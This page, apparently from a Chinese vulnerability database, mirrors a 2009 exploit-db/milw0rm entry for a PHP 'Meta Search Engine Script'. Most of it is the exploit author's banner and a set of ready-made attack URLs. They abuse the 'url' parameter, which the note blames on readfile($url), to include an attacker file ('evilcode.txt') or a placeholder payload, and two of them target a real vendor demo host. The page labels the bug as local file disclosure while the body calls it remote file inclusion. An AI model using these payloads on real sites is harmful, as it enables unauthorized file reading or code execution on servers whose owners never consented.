投稿
https://www.exploit-db.com/exploits/9227
Meta Search Engine Script - 'url' Local File Disclosure
| 漏洞ID | 1058026 | 漏洞类型 | |
| 发布时间 | 2009-07-21 | 更新时间 | 2009-07-21 |
 CVE编号
|
N/A |  CNNVD-ID
|
N/A |
| 漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================
[»] Script: [ Meta Search Engine 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1 ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ USD 12.99 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit RFI + LIVE : vulnerability ]===
[»] http://www.site.com/patch/?url=[RFI]&file=Search
[»] http://www.site.com/patch/index.php?url=[RFI]&file=Search
[»] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[»] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search
Author: Moudi
###########################################################################
note: readfile($url) is the issue, so fd
# milw0rm.com [2009-07-21]检索漏洞
开始时间
结束时间